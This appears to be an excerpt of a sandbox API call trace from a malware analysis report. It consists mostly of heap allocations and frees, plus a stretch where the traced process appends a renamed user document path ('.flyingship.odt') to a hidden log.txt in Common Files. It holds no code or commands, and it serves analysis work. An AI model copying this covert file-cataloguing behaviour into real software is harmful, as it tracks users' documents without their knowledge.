RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0173.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x130) returned 0x8fff00 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0173.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa5f008 [0173.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.114] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.115] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.115] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0173.115] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.115] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0173.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.116] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0173.116] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x11d2, lpOverlapped=0x0) returned 1 [0173.116] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0173.116] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x11d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.116] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0173.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.flyingship.odt\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0173.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x51) returned 0x8c4a48 [0173.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.flyingship.odt\r\n", cchWideChar=81, lpMultiByteStr=0x8c4a48, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.flyingship.odt\r\n", lpUsedDefaultChar=0x0) returned 81 [0173.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0173.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0173.117] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x50, lpOverlapped=0x0) returned 1 [0173.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0173.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.117] CloseHandle (hObject=0x138) returned 1 [0173.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0173.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0173.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0173.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0173.119] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0173.119] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.121] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0173.121] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.121] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0173.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0173.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.121] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0173.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0173.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0173.122] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0173.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0173.124] RtlAllocateHeap 